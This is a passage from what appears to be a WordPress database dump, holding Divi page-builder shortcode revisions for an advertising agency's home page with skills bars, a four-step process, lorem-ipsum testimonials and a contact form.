module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:46:59','2020-07-09 20:46:59','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(302,1,'2020-07-09 20:49:31','2020-07-09 20:49:31','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" 